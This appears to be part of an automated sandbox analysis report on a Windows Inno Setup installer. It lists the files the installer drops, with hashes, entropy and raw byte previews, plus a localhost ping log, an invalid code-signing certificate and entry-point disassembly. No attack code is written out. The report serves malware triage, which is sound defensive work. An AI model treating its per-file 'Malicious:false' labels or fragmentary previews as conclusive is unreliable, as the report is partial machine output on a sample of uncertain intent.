                                                                                                                                                  SHA-256:F52C4DCD61503F74EF1BC7F98CF8BB79963826CCCD35B0EFBFE5E3CAC8D75DD0
                                                                                                                                                  SHA-512:690240495B7D41303D25B60B3DBB668C45C4DD6015F315DB80BA36656EB040A1D59B0D1FEAEC7ECA2AF2FC0C4DBA6BB6504D9B08BBEC40910CFF9EED4294E8DF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml version="1.0"?>..<instrumentationManifest ...xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd"...xmlns="http://schemas.microsoft.com/win/2004/08/events"...xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:xs="http://www.w3.org/2001/XMLSchema"...xmlns:trace="http://schemas.microsoft.com/win/2004/08/events/trace"...>...<instrumentation>....<events>.....<provider......name="NVFT-ETW-OPENVR"......guid="{B37F4CA5-5507-42CF-B8C7-BABE280601D2}"......symbol="ETW_PROVIDER_NVFT_OPENVR_GUID"......resourceFileName="NvFrapsOpenVREvents.res"......messageFileName="msg"......>......<maps>.......<valueMap name="APIType">........<map.........message="$(string.Map.Unknown)".........value="0"........./> ........<map.........message="$(string.Map.OGL)".........value="1"........./> ........<map.........message="$(string.Map.VK)".........value="2"........./>........<map.........message="$
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1081896
                                                                                                                                                  Entropy (8bit):6.388045515573479
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:2yreuN4w1fUww+h7w1t3rykcmM/SWzWglboG/mTq3fNuPF67HGC5SYCM:DNBZ/gE3mM/SWWsbT/cq3fNuGGC5SYCM
                                                                                                                                                  MD5:4CB4AA663071A4461290D2CC0AB5407E
                                                                                                                                                  SHA1:96BC4504C025F3D9BD11B3D541401D69CF81126D
                                                                                                                                                  SHA-256:3C7E2F14C47388A84F016408668834D9388C294C791296CAE81DA4581DD1FAFC
                                                                                                                                                  SHA-512:88284D66651A7923D92898C3D4105CB69E5F90AD49BE547C94FA9C5254DDCE3A3626234211FBA7ED5400E671AC8B50D52CEF4EF59203511C27A2A39C202CF83D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ti..5...5...5...S...5...S...5...S..05...k...5...k...5...k...5...S...5...S...5...5...4..-k...5..-k...5...5...5..-k...5..Rich.5..........PE..d...8..c.........."................. ..........@.....................................l....`.................................................P...P........d.......~...\..(&......T.......p...................P...(...`................................................text............................... ..`.rdata...b.......d..................@..@.data........0...@..................@....pdata...~...........V..............@..@.didat..x....`......................@....tls.........p......................@....rsrc....d.......f..................@..@.reloc..T............B..............@..B........................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15400
                                                                                                                                                  Entropy (8bit):6.508481145269509
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:pUQl2bzfzEq+1QmZGdIYiYF80CKRZKx7yhDO4NKzYJzkMDxHtFhFYA1FG:mPIjaIYi5Km0hD9NfNzW
                                                                                                                                                  MD5:BA6DFB6F8E350F05B34E97098766A59F
                                                                                                                                                  SHA1:45FD6CF90130123B24431892E61DD2AFFECCA8C5
                                                                                                                                                  SHA-256:75263FC3534A3162B9E44E353B3C2379169787286DF7B65CB4ADC3D8BFBD533C
                                                                                                                                                  SHA-512:ABC703996A2947F36DC393B896FB7D7A3A0630F4CCEC6FF8F5077519B4FDC4A6464222EB653A5AF5B93D03E7BCCD728EB32D0F863532FE00E140B4904CFBB65F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R...R...R.....R...P...R.Rich..R.PE..d......[.........." .........................................................@............`.......................................................... ..................(&...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@.......[........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):553
                                                                                                                                                  Entropy (8bit):4.92146093309903
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:wKDwg7qQNLX9H/Qv/KO0zdPKiayeR3HO0zdvS/jFNxH8z:w9qqQNLX9HUUdDUd48z
                                                                                                                                                  MD5:3F1A83F12B3540BBFE8DA771A322D201
                                                                                                                                                  SHA1:747639FEB46633B130D3D0BA54DEFD564D460991
                                                                                                                                                  SHA-256:27F6077CAC271727410E23493E3E2A0F84A0B0BED9A36F6BC48A9FA1E35BD155
                                                                                                                                                  SHA-512:B53950268CD058E4450CD443439DDE84A9EC609DE1B10D77270B0442259F875142FDE6DA17843B1EF95FF91BDD45ACF735BBD44E43E6A50467305339B15D41EF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:@echo off..setlocal..REM Run this script from an admininistrator prompt to install NVIDIA ETW tracing....echo Installing NVIDIA Display Driver ETW Manifest manifest.......REM Uninstall existing manifest first..wevtutil.exe uninstall-manifest "ddETWExternal.xml"....REM Copy the ETW resource to system directory..xcopy /y /f ddETWExternal.dll %WINDIR%\System32\....REM Install the new manifest..wevtutil.exe install-manifest "ddETWExternal.xml"....REM Ensure that the provider was installed successfully..wevtutil get-publisher NVIDIA-DD-External > nul..
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (399), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11436
                                                                                                                                                  Entropy (8bit):3.5736297585775354
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:HEwXjhdOxPUjRPUEvwG5yNq1U6W1ppHrVGtGlGd0pi+o/m/vUjWqkB4BVWeW8vT6:65UjZUhNq1U6mPM+
                                                                                                                                                  MD5:A39215CF85D8B4140CF4ED3E215F87C4
                                                                                                                                                  SHA1:8E6B89FB938F847C02DACF8E767C671D2218727C
                                                                                                                                                  SHA-256:7AA7F8194A0FE5B2A713A610F7C3A22C74E82BFFDB7B13582BC97A8ED23389B7
                                                                                                                                                  SHA-512:2D596634403F5A564314C6CC5D1E6F5A1CE0E9DD3B95502D4F64A2B1D42B3404ADC51AC4F97732EF2A3CD773AD96A3375C7D0BBE05F02AFDA6F5848860965717
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t. .x.s.i.:.s.c.h.e.m.a.L.o.c.a.t.i.o.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s. .e.v.e.n.t.m.a.n...x.s.d.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s.". .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s.". .x.m.l.n.s.:.x.s.i.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.-.i.n.s.t.a.n.c.e.". .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.". .x.m.l.n.s.:.t.r.a.c.e.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.t.r.a.c.e.".>.......<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>.........<.e.v.e.n.t.s.>...........<.p.r.o.v.i.d.e.r. .n.a.m.e.=.".N.V.I.D.I.A.
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1081896
                                                                                                                                                  Entropy (8bit):6.388045515573479
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:2yreuN4w1fUww+h7w1t3rykcmM/SWzWglboG/mTq3fNuPF67HGC5SYCM:DNBZ/gE3mM/SWWsbT/cq3fNuGGC5SYCM
                                                                                                                                                  MD5:4CB4AA663071A4461290D2CC0AB5407E
                                                                                                                                                  SHA1:96BC4504C025F3D9BD11B3D541401D69CF81126D
                                                                                                                                                  SHA-256:3C7E2F14C47388A84F016408668834D9388C294C791296CAE81DA4581DD1FAFC
                                                                                                                                                  SHA-512:88284D66651A7923D92898C3D4105CB69E5F90AD49BE547C94FA9C5254DDCE3A3626234211FBA7ED5400E671AC8B50D52CEF4EF59203511C27A2A39C202CF83D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ti..5...5...5...S...5...S...5...S..05...k...5...k...5...k...5...S...5...S...5...5...4..-k...5..-k...5...5...5..-k...5..Rich.5..........PE..d...8..c.........."................. ..........@.....................................l....`.................................................P...P........d.......~...\..(&......T.......p...................P...(...`................................................text............................... ..`.rdata...b.......d..................@..@.data........0...@..................@....pdata...~...........V..............@..@.didat..x....`......................@....tls.........p......................@....rsrc....d.......f..................@..@.reloc..T............B..............@..B........................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):553
                                                                                                                                                  Entropy (8bit):4.92146093309903
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:wKDwg7qQNLX9H/Qv/KO0zdPKiayeR3HO0zdvS/jFNxH8z:w9qqQNLX9HUUdDUd48z
                                                                                                                                                  MD5:3F1A83F12B3540BBFE8DA771A322D201
                                                                                                                                                  SHA1:747639FEB46633B130D3D0BA54DEFD564D460991
                                                                                                                                                  SHA-256:27F6077CAC271727410E23493E3E2A0F84A0B0BED9A36F6BC48A9FA1E35BD155
                                                                                                                                                  SHA-512:B53950268CD058E4450CD443439DDE84A9EC609DE1B10D77270B0442259F875142FDE6DA17843B1EF95FF91BDD45ACF735BBD44E43E6A50467305339B15D41EF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:@echo off..setlocal..REM Run this script from an admininistrator prompt to install NVIDIA ETW tracing....echo Installing NVIDIA Display Driver ETW Manifest manifest.......REM Uninstall existing manifest first..wevtutil.exe uninstall-manifest "ddETWExternal.xml"....REM Copy the ETW resource to system directory..xcopy /y /f ddETWExternal.dll %WINDIR%\System32\....REM Install the new manifest..wevtutil.exe install-manifest "ddETWExternal.xml"....REM Ensure that the provider was installed successfully..wevtutil get-publisher NVIDIA-DD-External > nul..
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):943784
                                                                                                                                                  Entropy (8bit):6.621472142472864
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                  MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                  SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                  SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                  SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62696
                                                                                                                                                  Entropy (8bit):7.997465407479189
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:DRJTbCqFC3mhFOwLah/4qYkDwlAzIbU7BoDwUIi1OgEYgdFGA:1tblFbGwLa2kEloOwwVEYo/
                                                                                                                                                  MD5:025C4F4147CDF2A529ABA92B249A86AA
                                                                                                                                                  SHA1:A83259F31F6E78ACB9F01EB5880C72DD9CE435E7
                                                                                                                                                  SHA-256:5620E7C13F5C8B19C02FB1C1C27ECEEB88FEA23598411704563C3129093B862D
                                                                                                                                                  SHA-512:6A2F4443700E0AB26247C923287AC2A78CBB032457398951877F75D1CDFBCC1F417833D083DCCC37E2D772B0DC36CDA3E71EC41F0DDC451AECC6BAFC15157419
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............+..Kub7.+..Kub7kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~....t...6.....q.+....]7.+..Aab7m...........5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):510574
                                                                                                                                                  Entropy (8bit):6.622727339019667
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:q40MCF2RHzA4JoHwatPBVd1LCoD1aE/and8as/CmbO:30MCFmyQoJVjNaYa/mbO
                                                                                                                                                  MD5:BD2302F160B9895DD7BCF9C7DFA9BEA7
                                                                                                                                                  SHA1:8FCB264280A30CC5F959D54AE75AE394054CA5A0
                                                                                                                                                  SHA-256:3EAFF063360A89395B52681248A64AA2A8ACCA6DA13EAA0194DB004FA2A612C0
                                                                                                                                                  SHA-512:2847C9E4233A5F5A662027D46EE04EB4D79AD937FBDDDC54B16E72547E34414094FF56BC08016FCF31BA5769CFCA2D7849AD3EDEA438C57B34402F1E105852E6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:P)y............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P)y......................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):943784
                                                                                                                                                  Entropy (8bit):6.621472142472864
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                  MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                  SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                  SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                  SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):510574
                                                                                                                                                  Entropy (8bit):6.622727339019667
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:q40MCF2RHzA4JoHwatPBVd1LCoD1aE/and8as/CmbO:30MCFmyQoJVjNaYa/mbO
                                                                                                                                                  MD5:BD2302F160B9895DD7BCF9C7DFA9BEA7
                                                                                                                                                  SHA1:8FCB264280A30CC5F959D54AE75AE394054CA5A0
                                                                                                                                                  SHA-256:3EAFF063360A89395B52681248A64AA2A8ACCA6DA13EAA0194DB004FA2A612C0
                                                                                                                                                  SHA-512:2847C9E4233A5F5A662027D46EE04EB4D79AD937FBDDDC54B16E72547E34414094FF56BC08016FCF31BA5769CFCA2D7849AD3EDEA438C57B34402F1E105852E6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:P)y............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P)y......................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62696
                                                                                                                                                  Entropy (8bit):7.997465407479189
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:DRJTbCqFC3mhFOwLah/4qYkDwlAzIbU7BoDwUIi1OgEYgdFGA:1tblFbGwLa2kEloOwwVEYo/
                                                                                                                                                  MD5:025C4F4147CDF2A529ABA92B249A86AA
                                                                                                                                                  SHA1:A83259F31F6E78ACB9F01EB5880C72DD9CE435E7
                                                                                                                                                  SHA-256:5620E7C13F5C8B19C02FB1C1C27ECEEB88FEA23598411704563C3129093B862D
                                                                                                                                                  SHA-512:6A2F4443700E0AB26247C923287AC2A78CBB032457398951877F75D1CDFBCC1F417833D083DCCC37E2D772B0DC36CDA3E71EC41F0DDC451AECC6BAFC15157419
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............+..Kub7.+..Kub7kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~....t...6.....q.+....]7.+..Aab7m...........5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.
                                                                                                                                                  Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):478
                                                                                                                                                  Entropy (8bit):4.9404427828211634
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:PKMRJpTeTeTeTeT0s+sEAFSkIrxMVlmJHaVzvv:/2fAokItULVDv
                                                                                                                                                  MD5:1D785D889CA617298A68D26DFEF974C4
                                                                                                                                                  SHA1:1CC36474033E2767B059019B12782CE558F1EA34
                                                                                                                                                  SHA-256:FE52FE8317F9F07F4AB830F6E3B1F1013BE4AA2A82DD5C86AA805648FC053230
                                                                                                                                                  SHA-512:EF34C2479BE5BA45B41584887354DE53EA15EC53EA74D57042FF57EB8A609B93DAC9A55297300C29320CE14966FB7704C9952BDC7C6E2DDD0DCA929884091CF3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.183897983146913
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                  • InstallShield setup (43055/19) 0.42%
                                                                                                                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                  File name:file.exe
                                                                                                                                                  File size:6'172'760 bytes
                                                                                                                                                  MD5:6fdf2cdf68ab1880aa76e7938e241fa3
                                                                                                                                                  SHA1:affc9a0aea771ad101357cc728951f5938b5e4e6
                                                                                                                                                  SHA256:e61ce90df13402909985f5312fdef798736eb10e0b5b6b280fb826538e7a597a
                                                                                                                                                  SHA512:7e649db70d39a135cd86a837308fb304f16c904456ca3b97a70b8f8b1fd617291de8974aab3808ac67e5d2f7e9efa3840bbdeba1e3558de33587c7ff94ce231d
                                                                                                                                                  SSDEEP:98304:FwREOBlkqxKUUhU5/UBovRdMwZg/nE00lNX0adDzBfoRR:POBlkqgUIufKaARR
                                                                                                                                                  TLSH:5D56C006F3899025F06A063B6DA6A75096FFFE211B25C9DF32A439DC4D326914E39F13
                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                  Icon Hash:0c0c2d33ceec80aa
                                                                                                                                                  Entrypoint:0x4a83bc
                                                                                                                                                  Entrypoint Section:.itext
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:6
                                                                                                                                                  OS Version Minor:1
                                                                                                                                                  File Version Major:6
                                                                                                                                                  File Version Minor:1
                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                  Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=Certum Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                  Not Before, Not After
                                                                                                                                                  • 23/08/2024 09:51:29 23/08/2025 09:51:28
                                                                                                                                                  Subject Chain
                                                                                                                                                  • CN=FAT\u0130H RAMAZAN \xc7IKAN, O=FAT\u0130H RAMAZAN \xc7IKAN, L=ISPARTA, C=TR
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:34EEA6DC3CF94A96B6C4895174D44711
                                                                                                                                                  Thumbprint SHA-1:CF51120A5C1FA97EA0B1822672435B5336F1B14D
                                                                                                                                                  Thumbprint SHA-256:673240C1B1E3C03AFCA2F6EF0CC4AA765ACE7E6FC0A8C6D2F476AF5C0D46A3C3
                                                                                                                                                  Serial:5E5F47BE103F0A44E83165AAD0AC77B4
                                                                                                                                                  Instruction
                                                                                                                                                  push ebp
                                                                                                                                                  mov ebp, esp
                                                                                                                                                  add esp, FFFFFFA4h
                                                                                                                                                  push ebx
                                                                                                                                                  push esi
                                                                                                                                                  push edi
                                                                                                                                                  xor eax, eax
                                                                                                                                                  mov dword ptr [ebp-3Ch], eax
                                                                                                                                                  mov dword ptr [ebp-40h], eax
                                                                                                                                                  mov dword ptr [ebp-5Ch], eax
                                                                                                                                                  mov dword ptr [ebp-30h], eax
                                                                                                                                                  mov dword ptr [ebp-38h], eax
                                                                                                                                                  mov dword ptr [ebp-34h], eax
                                                                                                                                                  mov dword ptr [ebp-2Ch], eax
                                                                                                                                                  mov dword ptr [ebp-28h], eax
                                                                                                                                                  mov dword ptr [ebp-14h], eax
                                                                                                                                                  mov eax, 004A2EBCh
                                                                                                                                                  call 00007FE4F9046325h
                                                                                                                                                  xor eax, eax
                                                                                                                                                  push ebp
                                                                                                                                                  push 004A8AC1h
                                                                                                                                                  push dword ptr fs:[eax]
                                                                                                                                                  mov dword ptr fs:[eax], esp
                                                                                                                                                  xor edx, edx
                                                                                                                                                  push ebp
                                                                                                                                                  push 004A8A7Bh
                                                                                                                                                  push dword ptr fs:[edx]
                                                                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                                                                  mov eax, dword ptr [004B0634h]
                                                                                                                                                  call 00007FE4F90D7CABh
                                                                                                                                                  call 00007FE4F90D77FEh
                                                                                                                                                  lea edx, dword ptr [ebp-14h]
                                                                                                                                                  xor eax, eax
                                                                                                                                                  call 00007FE4F90D24D8h
                                                                                                                                                  mov edx, dword ptr [ebp-14h]
                                                                                                                                                  mov eax, 004B41F4h
                                                                                                                                                  call 00007FE4F90403D3h
                                                                                                                                                  push 00000002h
                                                                                                                                                  push 00000000h
                                                                                                                                                  push 00000001h
                                                                                                                                                  mov ecx, dword ptr [004B41F4h]
                                                                                                                                                  mov dl, 01h
                                                                                                                                                  mov eax, dword ptr [0049CD14h]
                                                                                                                                                  call 00007FE4F90D3803h
                                                                                                                                                  mov dword ptr [004B41F8h], eax
                                                                                                                                                  xor edx, edx
                                                                                                                                                  push ebp
                                                                                                                                                  push 004A8A27h
                                                                                                                                                  push dword ptr fs:[edx]
                                                                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                                                                  call 00007FE4F90D7D33h
                                                                                                                                                  mov dword ptr [004B4200h], eax
                                                                                                                                                  mov eax, dword ptr [004B4200h]
                                                                                                                                                  cmp dword ptr [eax+0Ch], 01h
                                                                                                                                                  jne 00007FE4F90DEA1Ah
                                                                                                                                                  mov eax, dword ptr [004B4200h]
                                                                                                                                                  mov edx, 00000028h
                                                                                                                                                  call 00007FE4F90D40F8h
